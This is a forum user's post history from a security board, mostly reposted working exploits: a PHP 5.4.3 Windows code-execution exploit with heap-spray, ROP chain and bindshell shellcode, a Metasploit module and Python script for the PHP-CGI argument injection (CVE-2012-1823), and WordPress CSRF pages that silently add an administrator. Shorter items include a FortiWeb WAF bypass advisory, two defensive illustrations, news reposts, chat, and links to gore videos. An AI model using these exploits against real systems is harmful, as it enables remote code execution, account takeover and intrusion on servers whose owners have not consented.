Everything posted by Nytro
-
[h=1]PHP 5.4 (5.4.3) Code Execution (Win32)[/h]
[code]
// Exploit Title: PHP 5.4 (5.4.3) Code Execution 0day (Win32)
// Exploit author: 0in (Maksymilian Motyl)
// Email: 0in(dot)email(at)gmail.com
// * Bug with Variant type parsing originally discovered by Condis
// Tested on Windows XP SP3 fully patched (Polish)

=================== offset-brute.html ===================
<html><body>
<title>0day</title>
<center>
<font size=7>PHP 5.4.3 0day by 0in & cOndis</font><br>
<textarea rows=50 cols=50 id="log"></textarea>
</center>
<script>
function sleep(milliseconds) {
  var start = new Date().getTime();
  for (var i = 0; i < 1e7; i++) {
    if ((new Date().getTime() - start) > milliseconds){
      break;
    }
  }
}

function makeRequest(url, parameters) {
  var xmlhttp = new XMLHttpRequest();
  if (window.XMLHttpRequest) {
    xmlhttp = new XMLHttpRequest();
    if (xmlhttp.overrideMimeType) {
      xmlhttp.overrideMimeType('text/xml');
    }
  } else if (window.ActiveXObject) { // IE
    try {
      xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
    } catch (e) {
      try {
        xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
      } catch (e) {}
    }
  }
  if (!xmlhttp) {
    alert('Giving up Cannot create an XMLHTTP instance');
    return false;
  }
  xmlhttp.open("GET",url,true);
  xmlhttp.send(null);
  return true;
}

test=document.getElementById("log");
for(offset=0;offset<300;offset++) {
  log.value+="Trying offset:"+offset+"\r\n";
  makeRequest("0day.php?offset="+offset);
  sleep(500);
}
</script></body></html>

=================== 0day.php ===================
<?php
$spray = str_repeat("\x90",0x200);
$offset=$_GET['offset'];

// 775DF0Da # ADD ESP,10 # RETN ** [ole32.dll]
$spray = substr_replace($spray, "\xda\xf0\x5d\x77", (strlen($spray))*-1,(strlen($spray))*-1);
// :> 0x048d0030
$spray = substr_replace($spray, pack("L",0x048d0030+$offset), (strlen($spray)-0x8)*-1,(strlen($spray))*-1);
//0x7752ae9f (RVA : 0x0005ae7f) : # XCHG EAX,ESP # MOV ECX,468B0000 # OR AL,3 # RETN [ole32.dll]
$spray = substr_replace($spray, "\x9f\xae\x52\x77", (strlen($spray)-0x10)*-1,(strlen($spray))*-1);
// Adress of VirtualProtect 0x7c801ad4
$spray = substr_replace($spray, "\xd4\x1a\x80\x7c", (strlen($spray)-0x14)*-1,(strlen($spray))*-1);
// LPVOID lpAddress = 0x048d0060
$spray = substr_replace($spray, pack("L",0x048d0060+$offset), (strlen($spray)-0x1c)*-1,(strlen($spray))*-1);
// SIZE_T dwSize = 0x01000000
$spray = substr_replace($spray, "\x00\x00\x10\x00", (strlen($spray)-0x20)*-1,(strlen($spray))*-1);
// DWORD flNewProtect = PAGE_EXECUTE_READWRITE (0x00000040) | 0xffffffc0
$spray = substr_replace($spray, "\x40\x00\x00\x00", (strlen($spray)-0x24)*-1,(strlen($spray))*-1);
// __out PDWORD lpflOldProtect = 0x04300070 | 0x105240000 // 0x048d0068
$spray = substr_replace($spray, pack("L",0x048d0068+$offset), (strlen($spray)-0x28)*-1,(strlen($spray))*-1);
//0x77dfe8b4 : # XOR EAX,EAX # ADD ESP,18 # INC EAX # POP EBP # RETN 0C ** [ADVAPI32.dll]
$spray = substr_replace($spray, "\xb4\xe8\xdf\x77", (strlen($spray)-0x18)*-1,4);
// Ret Address = 0x048d0080
$spray = substr_replace($spray, pack("L",0x048d0080+$offset), (strlen($spray)-0x48)*-1,4);

$stacktrack = "\xbc\x0c\xb0\xc0\x00";

// Universal win32 bindshell on port 1337 from metasploit
$shellcode = $stacktrack."\x33\xc9\x83\xe9\xb0".
"\x81\xc4\xd0\xfd\xff\xff".
"\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1d".
"\xcc\x32\x69\x83\xeb\xfc\xe2\xf4\xe1\xa6\xd9\x24\xf5\x35\xcd\x96".
"\xe2\xac\xb9\x05\x39\xe8\xb9\x2c\x21\x47\x4e\x6c\x65\xcd\xdd\xe2".
"\x52\xd4\xb9\x36\x3d\xcd\xd9\x20\x96\xf8\xb9\x68\xf3\xfd\xf2\xf0".
"\xb1\x48\xf2\x1d\x1a\x0d\xf8\x64\x1c\x0e\xd9\x9d\x26\x98\x16\x41".
"\x68\x29\xb9\x36\x39\xcd\xd9\x0f\x96\xc0\x79\xe2\x42\xd0\x33\x82".
"\x1e\xe0\xb9\xe0\x71\xe8\x2e\x08\xde\xfd\xe9\x0d\x96\x8f\x02\xe2".
"\x5d\xc0\xb9\x19\x01\x61\xb9\x29\x15\x92\x5a\xe7\x53\xc2\xde\x39".
"\xe2\x1a\x54\x3a\x7b\xa4\x01\x5b\x75\xbb\x41\x5b\x42\x98\xcd\xb9".
"\x75\x07\xdf\x95\x26\x9c\xcd\xbf\x42\x45\xd7\x0f\x9c\x21\x3a\x6b".
"\x48\xa6\x30\x96\xcd\xa4\xeb\x60\xe8\x61\x65\x96\xcb\x9f\x61\x3a".
"\x4e\x9f\x71\x3a\x5e\x9f\xcd\xb9\x7b\xa4\x37\x50\x7b\x9f\xbb\x88".
"\x88\xa4\x96\x73\x6d\x0b\x65\x96\xcb\xa6\x22\x38\x48\x33\xe2\x01".
"\xb9\x61\x1c\x80\x4a\x33\xe4\x3a\x48\x33\xe2\x01\xf8\x85\xb4\x20".
"\x4a\x33\xe4\x39\x49\x98\x67\x96\xcd\x5f\x5a\x8e\x64\x0a\x4b\x3e".
"\xe2\x1a\x67\x96\xcd\xaa\x58\x0d\x7b\xa4\x51\x04\x94\x29\x58\x39".
"\x44\xe5\xfe\xe0\xfa\xa6\x76\xe0\xff\xfd\xf2\x9a\xb7\x32\x70\x44".
"\xe3\x8e\x1e\xfa\x90\xb6\x0a\xc2\xb6\x67\x5a\x1b\xe3\x7f\x24\x96".
"\x68\x88\xcd\xbf\x46\x9b\x60\x38\x4c\x9d\x58\x68\x4c\x9d\x67\x38".
"\xe2\x1c\x5a\xc4\xc4\xc9\xfc\x3a\xe2\x1a\x58\x96\xe2\xfb\xcd\xb9".
"\x96\x9b\xce\xea\xd9\xa8\xcd\xbf\x4f\x33\xe2\x01\xf2\x02\xd2\x09".
"\x4e\x33\xe4\x96\xcd\xcc\x32\x69";

$spray = substr_replace($spray,$shellcode, (strlen($spray)-0x50)*-1,(strlen($shellcode)));

$fullspray="";
for($i=0;$i<0x4b00;$i++) {
  $fullspray.=$spray;
}

$j=array(); $e=array(); $b=array(); $a=array(); $c=array();
array_push($j,$fullspray);
array_push($e,$fullspray."W");
array_push($b,$fullspray."A");
array_push($a,$fullspray."S");
array_push($c,$fullspray."!");

$vVar = new VARIANT(0x048d0038+$offset);
// Shoot him
com_print_typeinfo($vVar);
//CRASH -> 102F3986 FF50 10 CALL DWORD PTR DS:[EAX+10]
echo $arr;
echo $spray;
?>
[/code]
Source: PHP 5.4 (5.4.3) Code Execution (Win32)
-
OK, when I get home tonight, tell me on Messenger so I don't forget.
-
It's probably not for you.
-
User unu_1234567 has had his V.I.P. rank removed because he took advantage of it to gain trust. He will not receive a ban under any circumstances, given his contributions; those with seniority will understand. We hope it won't happen again. It is up to you to decide the moral "winner" of the dispute and whether you will get involved in trades with them, but keep in mind that both are people who deserve respect, even though many of you probably know nothing about them.
-
They're not fake, kid; in Africa women are still burned at the stake for witchcraft, reality is harsh. In Tibet nuns set themselves on fire: Self Immolation Video of Buddhist Nun Palden Choetso in Tibet | Best Gore Self Immolation of a Nun in Tibet | Best Gore Then, in the middle of "civilization": http://www.bestgore.com/execution/african-man-lynched-burned-alive-gay-necklacing-failed/
-
GET and POST requests using the RollingCurl library
Nytro replied to konkhra's topic in Programare
Pff, I don't like how the library is built; I don't think the example http://rolling-curl.googlecode.com/svn/trunk/example_groups.php helps you. Use plain curl, with curl_multi_exec.
-
Adobe Photoshop CS5.1 U3D.8BI Collada Asset Elements Stack Overflow
Nytro replied to The_Arhitect's topic in Exploituri
Photoshop CS5 (12.04, I think) crashes, but the shellcode doesn't execute. Does anyone have CS5.1 to try it?
-
Friends know why.
-
They're both good guys (from other points of view); we'll see tonight what's to be done.
-
PHP-CGI Exploitation by Example - SpiderLabs
-
[h=1]Download BitDefender Total Security 2013 Beta – Testing has begun[/h]
By Radu FaraVirusi(com) on May 7, 2012
BitDefender announces the launch of BitDefender Total Security 2013 Beta, which can be evaluated free of charge for 60 days.
What's new?
- Device Anti-Theft
- USB Immunizer
- Windows Widget
- improvements to Parental Control, BitDefender SafeBox, MyBitDefender Dashboard
To download BitDefender Total Security 2013 Beta go to: Bitdefender Total Security 2013 BETA
Source: Download BitDefender Total Security 2013 Beta – Testing has begun
-
[h=1]Fortinet FortiWeb Web Application Firewall Policy Bypass[/h]
BINAR10 Report on Fortinet Fortiweb Findings
02/05/2012 - Fortinet FortiWeb Web Application Firewall Policy Bypass -
============================================================

1) Affected Product
Fabricant: Fortinet
Product name: FortiWeb
Version: Latest update to Tue, 2 May 2012
Type: Web Application Firewall
Product URL: http://www.fortinet.com/products/fortiweb/index.html

2) Description of the Findings
BINAR10 has found a policy bypass occurrence when large-size data is sent in a POST (data) or GET request.

3) Technical Details

3.1. POST Request Example
When any padding data that surpasses 2399 bytes is appended to a POST request, the WAF does not inspect the data sent and the request hits the application directly. This should occur when the product is not configured to block malformed requests, but that feature also checks the POST size limit, blocking the request if it surpasses a fixed limit; therefore it is likely to be disabled due to application requirements in medium-size forms. The response is also not verified by the WAF, and information disclosure occurs with details of the infrastructure. This bypass could be used to inject different types of vectors; as shown in the example, all that is needed is to append a new variable at the end of the POST data, filled with arbitrary data that exceeds 2399 bytes.

---POST example
[code]
POST /<path>/login-app.aspx HTTP/1.1
Host: <host>
User-Agent: <any valid user agent string>
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: <the content length must be at least 2399 bytes>

var1=datavar1&var2=datavar12&pad=<random data to complete at least 2399 bytes>
[/code]

3.2. GET Requests
The same issue as with POST requests, but it can be done by sending arbitrary data at the end of the URL.

--GET example
[code]
http://<domain>/path?var1=vardata1&var2=vardata2&pad=<large arbitrary data>
[/code]

4. Validation Required
It requires the validation of other researchers who have access to the product.

5. Time Table
04/27/2012 - Vendor notified.
04/27/2012 - Vendor response, requiring some tests.
05/02/2012 - Vendor indicates that this is a configuration problem and not a product vulnerability.

6. Credits
Geffrey Velasquez <geffrey at gmail.com> at BINAR10 S.A.C.

Source: Fortinet FortiWeb Web Application Firewall Policy Bypass
-
The Curious Case of Benjamin Button
Sherlock Holmes
Ring of the Nibelungs
The Illusionist
The Librarian
Butterfly Effect
Dark Floors
Room 1408
The Cube
The Eye
Triangle
Not necessarily psychological, but worth watching.
-
I moved it there (from Anunturi + warn); I didn't know where else. Calm down.
-
Have you looked here: oberhumer.com: LZO real-time data compression library ?
-
[h=1]Wordpress 3.3.1 Multiple CSRF Vulnerabilities[/h]
+---------------------------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title : Wordpress 3.3.1 Multiple CSRF Vulnerabilities
# Date : 19-03-2012
# Author : Ivano Binetti (http://www.ivanobinetti.com)
# Software link : http://wordpress.org/wordpress-3.3.1.zip
# Vendor site : http://wordpress.org
# Version : 3.3.1 (and lower). Probably also version 3.3.2 is affected.
# Tested on : Debian Squeeze (6.0)
# Original Advisory : http://www.webapp-security.com/2012/04/wordpress-3-3-1-multiple-csrf-vulnerabilities/
# CVE : CVE-2012-1936
# OSVDB ID : 81588
# Bugtraq ID : 53280
+---------------------------------------------------------------------------------------------------------------------------------------------------+

Summary
1) Introduction
2) Vulnerabilities Description
   2.1 Multiple CSRF
3) Exploit
   3.1 CSRF (Change Post Title)
   3.2 CSRF (Add Admin)
+---------------------------------------------------------------------------------------------------------------------------------------------------+

1) Introduction
WordPress "is web software you can use to create a beautiful website or blog. We like to say that WordPress is both free and priceless at the same time."

2) Vulnerability Description

2.1 Multiple CSRF
Wordpress 3.3.1 suffers from multiple CSRF vulnerabilities which allow an attacker to change the post title, add administrators/users, delete administrators/users, approve and unapprove comments, delete comments, change the background image, insert a custom header image, change the site title, change the administrator's email, change the Wordpress Address and change the Site Address when an authenticated user/admin browses a specially crafted web page. Maybe other parameters can be modified.

This vulnerability is caused by a security flaw in anti-CSRF token (_wpnonce, _wpnonce_create-user, _ajax_nonce, _wpnonce-custom-background-upload, _wpnonce-custom-header-upload) generation. For some operations (see below) the above specified anti-CSRF tokens are not associated with the current user session (as Owasp recommends) but are valid for all operations (for a specific administrator/user) within 12 hours. The above described vulnerability allows an attacker - who has sniffed the anti-CSRF token - to have 12 hours to perform a CSRF attack.
For the Owasp recommendation about anti-CSRF tokens, you can read the following document:
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29_Prevention_Cheat_Sheet#General_Recommendation:_Synchronizer_Token_Pattern

This problem affects the following operations:
- Add Admin/User
- Delete Admin/User
- Approve comment
- Unapprove comment
- Delete comment
- Change background image
- Insert custom header image
- Change site title
- Change administrator's email
- Change Wordpress Address
- Change Site Address

Other operations (like inserting a new post) are not affected by this CSRF vulnerability.
In this Advisory I will only demonstrate how to change the post title and how to add a new administrator account.

3) Exploit

3.1 CSRF (Change Post Title)
[code]
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to change post title</H2>
<form method="POST" name="form0" action="http://<wordpress_ip>:80/wp-admin/admin-ajax.php">
<input type="hidden" name="post_title" value="hackedtitle"/>
<input type="hidden" name="post_name" value="hackedtitle"/>
<input type="hidden" name="mm" value="03"/>
<input type="hidden" name="jj" value="16"/>
<input type="hidden" name="aa" value="2012"/>
<input type="hidden" name="hh" value=""/>
<input type="hidden" name="mn" value=""/>
<input type="hidden" name="ss" value=""/>
<input type="hidden" name="post_author" value="1"/>
<input type="hidden" name="post_password" value=""/>
<input type="hidden" name="post_category%5B%5D" value="0"/>
<input type="hidden" name="post_category%5B%5D" value="1"/>
<input type="hidden" name="tax_input%5Bpost_tag%5D" value=""/>
<input type="hidden" name="comment_status" value="open"/>
<input type="hidden" name="ping_status" value="open"/>
<input type="hidden" name="_status" value="publish"/>
<input type="hidden" name="post_format" value="0"/>
<input type="hidden" name="_inline_edit" value="<sniffed_value>"/>
<input type="hidden" name="post_view" value="list"/>
<input type="hidden" name="screen" value="edit-post"/>
<input type="hidden" name="action" value="inline-save"/>
<input type="hidden" name="post_type" value="post"/>
<input type="hidden" name="post_ID" value="1"/>
<input type="hidden" name="edit_date" value="true"/>
<input type="hidden" name="post_status" value="all"/>
</form>
</body>
</html>
[/code]
Note: this exploit simulates changing the post title using the "Quick Edit" function.

3.2 CSRF (Add Admin)
[code]
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to add Administrator</H2>
<form method="POST" name="form0" action="http://<wordpress_ip>:80/wp-admin/user-new.php">
<input type="hidden" name="action" value="createuser"/>
<input type="hidden" name="_wpnonce_create-user" value="<sniffed_value>"/>
<input type="hidden" name="_wp_http_referer" value="%2Fwordpress%2Fwp-admin%2Fuser-new.php"/>
<input type="hidden" name="user_login" value="admin2"/>
<input type="hidden" name="email" value="admin2@admin.com"/>
<input type="hidden" name="first_name" value="admin2@admin.com"/>
<input type="hidden" name="last_name" value=""/>
<input type="hidden" name="url" value=""/>
<input type="hidden" name="pass1" value="password"/>
<input type="hidden" name="pass2" value="password"/>
<input type="hidden" name="role" value="administrator"/>
<input type="hidden" name="createuser" value="Add+New+User+"/>
</form>
</body>
</html>
[/code]
+--------------------------------------------------------------------------------------------------------------------------------------------------+
Source: Wordpress 3.3.1 Multiple CSRF Vulnerabilities
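Added here as a defender's illustration of the token flaw the advisory above describes; it is not WordPress code and not part of the advisory. It contrasts a token scoped only to the user and a 12-hour window with one that is also bound to the login session (the OWASP synchronizer token pattern the advisory cites), and simulates replaying a captured "create-user" token after the victim has logged in again. The key, user id and session ids are constructed sample values.

```python
import hashlib
import hmac

# Constructed sample key: a real deployment loads this from configuration.
SERVER_KEY = b"constructed-server-secret-key"
# The 12-hour validity window the advisory describes.
TICK_SECONDS = 12 * 60 * 60


def _mac(parts):
    """HMAC-SHA256 over '|'-joined fields, hex encoded."""
    msg = "|".join(str(p) for p in parts).encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()


def user_scoped_nonce(user_id, action, now):
    """Weak scheme, as the advisory describes it: the value depends only on
    the user, the action and the current 12-hour tick, so it is identical
    across every session of that user until the tick rolls over."""
    return _mac([now // TICK_SECONDS, action, user_id])[:10]


def verify_user_scoped(token, user_id, action, now):
    return hmac.compare_digest(token, user_scoped_nonce(user_id, action, now))


def session_bound_token(user_id, session_id, action, now):
    """Synchronizer token also bound to the login session, so a value that
    leaks from one session cannot be replayed against another."""
    return _mac([now // TICK_SECONDS, action, user_id, session_id])


def verify_session_bound(token, user_id, session_id, action, now):
    expected = session_bound_token(user_id, session_id, action, now)
    return hmac.compare_digest(token, expected)


def replay_succeeds(scheme, captured_at, replayed_at):
    """Simulate the attack in the advisory: a 'create-user' token captured at
    captured_at is replayed at replayed_at through a forged form, after the
    victim has logged in again and therefore holds a new session id.
    Returns True when the forged request would be accepted."""
    user_id = 1                      # constructed sample admin id
    action = "create-user"
    old_session = "sess-A-constructed"
    new_session = "sess-B-constructed"
    if scheme == "user-scoped":
        captured = user_scoped_nonce(user_id, action, captured_at)
        return verify_user_scoped(captured, user_id, action, replayed_at)
    if scheme == "session-bound":
        captured = session_bound_token(user_id, old_session, action, captured_at)
        return verify_session_bound(captured, user_id, new_session, action, replayed_at)
    raise ValueError(f"unknown scheme: {scheme}")


if __name__ == "__main__":
    for scheme in ("user-scoped", "session-bound"):
        print(scheme,
              "replay 1h later:", replay_succeeds(scheme, 0, 3600),
              "replay 13h later:", replay_succeeds(scheme, 0, 13 * 3600))
```

With the user-scoped scheme the captured token is still accepted an hour later in a fresh session; with the session-bound scheme it is rejected immediately, and the window only adds defence in depth.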
-
[h=1]PHP CGI Argument Injection[/h]
[code]
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'PHP CGI Argument Injection',
      'Description'    => %q{
          When run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to
        an argument injection vulnerability. This module takes advantage of
        the -d flag to set php.ini directives to achieve code execution.
        From the advisory: "if there is NO unescaped '=' in the query string,
        the string is split on '+' (encoded space) characters, urldecoded,
        passed to a function that escapes shell metacharacters (the "encoded
        in a system-defined manner" from the RFC) and then passes them to the
        CGI binary."
      },
      'Author'         => [ 'egypt', 'hdm' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision$',
      'References'     =>
        [
          [ "CVE"  , "2012-1823" ],
          [ "URL"  , "http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/" ],
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'DisableNops' => true,
          # Arbitrary big number. The payload gets sent as an HTTP
          # response body, so really it's unlimited
          'Space'       => 262144, # 256k
        },
      'DisclosureDate' => 'May 03 2012',
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [[ 'Automatic', { }]],
      'DefaultTarget'  => 0))

    register_options([
      OptString.new('TARGETURI', [false, "The URI to request (must be a CGI-handled PHP script)"]),
    ], self.class)
  end

  # php-cgi -h
  # ...
  #   -s               Display colour syntax highlighted source.
  def check
    uri = target_uri.path
    uri.gsub!(/\?.*/, "")

    print_status("Checking uri #{uri}")

    response = send_request_raw({ 'uri' => uri })

    if response and response.code == 200 and response.body =~ /\<code\>\<span style.*\<\;\?/mi
      print_error("Server responded in a way that was ambiguous, could not determine whether it was vulnerable")
      return Exploit::CheckCode::Unknown
    end

    response = send_request_raw({ 'uri' => uri + '?-s'})
    if response and response.code == 200 and response.body =~ /\<code\>\<span style.*\<\;\?/mi
      return Exploit::CheckCode::Vulnerable
    end

    print_error("Server responded indicating it was not vulnerable")
    return Exploit::CheckCode::Safe
  end

  def exploit
    begin
      args = [
        "-d+allow_url_include%3d#{rand_php_ini_true}",
        "-d+safe_mode%3d#{rand_php_ini_false}",
        "-d+suhosin.simulation%3d#{rand_php_ini_true}",
        "-d+disable_functions%3d%22%22",
        "-d+open_basedir%3dnone",
        "-d+auto_prepend_file%3dphp://input",
        "-n"
      ]
      qs = args.join("+")
      uri = "#{target_uri}?#{qs}"

      # Has to be all on one line, so gsub out the comments and the newlines
      payload_oneline = "<?php " + payload.encoded.gsub(/\s*#.*$/, "").gsub("\n", "")
      response = send_request_cgi( {
        'method' => "POST",
        'global' => true,
        'uri'    => uri,
        'data'   => payload_oneline,
      }, 0.5)

      handler
    rescue ::Interrupt
      raise $!
    rescue ::Rex::HostUnreachable, ::Rex::ConnectionRefused
      print_error("The target service unreachable")
    rescue ::OpenSSL::SSL::SSLError
      print_error("The target failed to negotiate SSL, is this really an SSL service?")
    end
  end

  def rand_php_ini_false
    Rex::Text.to_rand_case([ "0", "off", "false" ][rand(3)])
  end

  def rand_php_ini_true
    Rex::Text.to_rand_case([ "1", "on", "true" ][rand(3)])
  end

end
[/code]

[h=1]PHP CGI Argument Injection Exploit[/h]
[code]
######################################################################################
# Exploit Title: Cve-2012-1823 PHP CGI Argument Injection Exploit
# Date: May 4, 2012
# Author: rayh4c[0x40]80sec[0x2e]com
# Exploit Discovered by wofeiwo[0x40]80sec[0x2e]com
######################################################################################

import socket
import sys

def cgi_exploit():
    pwn_code = """<?php phpinfo();?>"""
    post_Length = len(pwn_code)
    http_raw="""POST /?-dallow_url_include%%3don+-dauto_prepend_file%%3dphp://input HTTP/1.1
Host: %s
Content-Type: application/x-www-form-urlencoded
Content-Length: %s

%s
""" %(HOST , post_Length ,pwn_code)

    print http_raw

    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((HOST, int(PORT)))
        sock.send(http_raw)
        data = sock.recv(10000)
        print repr(data)
        sock.close()
    except socket.error, msg:
        sys.stderr.write("[ERROR] %s\n" % msg[1])
        sys.exit(1)

if __name__ == '__main__':
    try:
        HOST = sys.argv[1]
        PORT = sys.argv[2]
        cgi_exploit()
    except IndexError:
        print '[+]Usage: cgi_test.py site.com 80'
        sys.exit(-1)
[/code]

Sources:
- PHP CGI Argument Injection
- PHP CGI Argument Injection Exploit
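Added here as a defender's example, not part of the reposted module or exploit: detection logic that applies the CGI parsing rule quoted in the module description (no unescaped '=' in the raw query string, then split on '+' and URL-decode) to sample access-log lines, flagging requests whose query string php-cgi would have received as command-line options. The log lines, paths and addresses are constructed.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache combined format; addresses come from
# documentation ranges and the requests mirror the patterns posted above.
SAMPLE_LOG = """\
203.0.113.5 - - [04/May/2012:10:01:02 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [04/May/2012:10:01:03 +0000] "GET /index.php?-s HTTP/1.1" 200 9031 "-" "Mozilla/5.0"
203.0.113.7 - - [04/May/2012:10:02:10 +0000] "POST /?-dallow_url_include%3don+-dauto_prepend_file%3dphp://input HTTP/1.1" 200 30 "-" "python-requests"
198.51.100.9 - - [04/May/2012:10:03:00 +0000] "GET /cgi-bin/php?q=-d+x HTTP/1.1" 200 77 "-" "curl/7.2"
198.51.100.9 - - [04/May/2012:10:03:05 +0000] "GET /search?query HTTP/1.1" 404 77 "-" "curl/7.2"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


def cgi_argv_from_query(query):
    """Apply the rule quoted in the module description: only when the raw
    query string contains NO unescaped '=' is it split on '+' and URL-decoded
    into command-line words. The '=' check happens before decoding, which is
    why an encoded '%3d' still reaches php-cgi as an option value."""
    if "=" in query:
        return []
    return [unquote(word) for word in query.split("+") if word]


def injected_options(query):
    """Words php-cgi would have parsed as options (for example -s, -d, -n)."""
    return [word for word in cgi_argv_from_query(query) if word.startswith("-")]


def scan_log(text):
    """Return one finding per request whose query string would reach php-cgi
    as options; each finding carries client ip, timestamp, path and options."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m is None:
            continue
        target = m.group("target")
        if "?" not in target:
            continue
        path, query = target.split("?", 1)
        options = injected_options(query)
        if options:
            findings.append({
                "ip": m.group("ip"),
                "time": m.group("ts"),
                "path": path,
                "options": options,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['path']} -> {' '.join(f['options'])}")
```

A query such as q=-d+x is deliberately not flagged: the literal '=' makes php-cgi treat it as a normal query string, which is exactly the boundary the advisory describes.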
-
Are you in Bucharest? Shall we go for a drink?
-
Zuckerberg's employees get rich from the moment they are hired
Nytro replied to Nytro's topic in Stiri securitate
The trick with the big salaries is that most of the time contracts are signed for long periods; that's probably the case here too. If someone signs for 2-3 years, within 6 months he already knows enough to be worth that salary (well, let's say 1 year), and then he becomes "profitable" for the company.
-
[h=2]Android Ported to C#[/h]
Oracle and Google are currently in a $1 billion wrestling match over Google's use of Java in Android. But Java is not the only way to build native apps on Android. In fact, it's not even the best way: we have been offering C# to Android developers as a high-performance, low-battery consuming alternative to Java. Our platform, Mono, is an open source implementation of the .NET framework that allows developers to write their code using C# while running on top of the Java-powered operating system, and then share that same code with iOS and Windows Phone.

Unlike Sun with Java, Microsoft submitted C# and the .NET VM for standardization to ECMA and saw those standards graduated all the way to ISO with strong patent commitments. The .NET framework is also covered by Microsoft's legally binding community promise.

Last July when Xamarin was getting started, we got our team together in Boston to plan the evolution of Mono on iOS and Android. After a day of kayaking in the Charles River, we sat down to dinner and turned our attention to how we could improve the performance and battery life of applications on Android, and make our own Mono for Android even better.

(Photo: the Xamarin team after a day of kayaking, back when we were a small company.)

Over and over we came back to the basics: Dalvik is a young virtual machine, it is not as performant or tuned as Mono and suffers from many of Java's performance limitations without the benefit of the high-end optimizations from Oracle's HotSpot.

One crazy idea that the team had at that dinner was to translate Android's source code to C#. Android would benefit from C# performance features like structures, P/Invoke, real generics and our more mature runtime. Although nothing happened back in July, this idea stuck in the back of our minds.

Fast forward a few months: Mono for Android is doing great, and we are starting to think again about improving our own product's performance on Android. What if we could swap out Java with faster C# and get rid of various Dalvik limitations in the process? Could we create an Android phone completely free of Java, and free of the limitations of the Dalvik VM? We decided it was crazy enough to try. So we started a small skunkworks project with the goal of doing a machine translation of Android from Java to C#. We called this project XobotOS.

[h=2]The XobotOS Research Project[/h]
The result of our efforts is that today we have most of Android's layouts and controls entirely in C#. Here are some screenshots of XobotOS running on a Linux workstation, no Java involved:

Getting to this point required that the majority of the Android Java code be translated from Java to C#, so what you see above represents very significant progress. So how did we do it?

[h=2]Java Translation via Sharpen[/h]
Android's core codebase contains over a million lines of Java code, and we knew we wanted to be able to stay up to date with new releases of Android — in fact, we started with the Android 2.x source code back in 2011, and then upgraded XobotOS to Android 4.0 when Google open sourced Ice Cream Sandwich earlier this year. So for us, the only reasonable option was to do a machine translation of Java to C#, building and maintaining any necessary tools along the way.

The tool we used as a starting point is called Sharpen. Sharpen is famous for helping people such as Frank Krueger port a Java applet to an award-winning iPad app in two months. We matured Sharpen a lot, and the result is a much-improved Java-to-C# translation tool for everyone. We are releasing this new version of Sharpen today along with the code for XobotOS and we hope that many more people will benefit from it and contribute to it.

[h=2]Performance[/h]
So once you have Android running on Mono, the obvious question is — how does Mono perform compared to Dalvik?

When C# came around, Microsoft modified the language in a couple of significant ways that made it easier to optimize. Value types were introduced to allow small objects to have low overheads, and virtual methods were made opt-in instead of opt-out, which made for simpler VMs. Later on, Java and C# diverged in the way that they implemented generics. Java went with a full backwards-compatibility approach, while C# baked the support into the runtime. The C# approach led to a simple-to-use, simple-to-understand generics setup as well as being much more performant and complete.

Since then, both the language and the execution environment have continued to evolve and improve. C# went from being a slightly better Java to being light-years ahead: embracing dynamic programming, bringing asynchronicity into the language, introducing iterators and functional programming constructs, embracing parallelism and getting a great implementation of generics. Many of these features came from the research done by Don Syme and his F# team, who have kept a steady flow of new ideas getting injected into the language. Furthermore, Mono as a virtual machine has matured substantially in the last 10 years and is now considered to be on its 8th generation.

All of this adds up. You can see the massive difference in the performance of structs and generics in this benchmark we ran of a simple binary tree implementation in Java and C#:

[h=2]What's Next[/h]
Today we're proud to announce that we've made XobotOS available on github so that you can try it out yourself. Our goal as a company is to provide the best platform for building mobile apps, and so XobotOS will not be a focus for us going forward. But it was a fun experiment to run, and as it turns out, a few technologies have come out of the effort that we'll be able to include in future versions of our products:

- Direct Graphics Access to Skia: Currently Mono for Android accesses the underlying graphics libraries through Java; with the code that we built for XobotOS, we will skip the middleman and use Mono's P/Invoke to get straight to the native rendering code in Skia.
- Java to C# tooling: Our new version of Sharpen is available as part of our XobotOS release.
- Replacing Java code with C# code: we now have the tools necessary to replace some chunks of Java code with C# code where performance is critical and when C# can offer better solutions than Java has.

Our plan is to take elements of the research project and integrate those into our products. A project that we started because we thought it would be fun to do has turned out to yield some serious benefits for our products. It's important for a startup to stay focused, but sometimes you have to try something crazy to make progress. And who knows, maybe Google will thank us some day.

Xamarin is hiring for many positions to advance the state of the art in mobile development.

Source: Android Ported to C# – Xamarin
-
Regarding Microsoft Windows, for those who are skeptical about the security of Windows systems...
Windows Firewall:
Group policy editor:
File permissions:
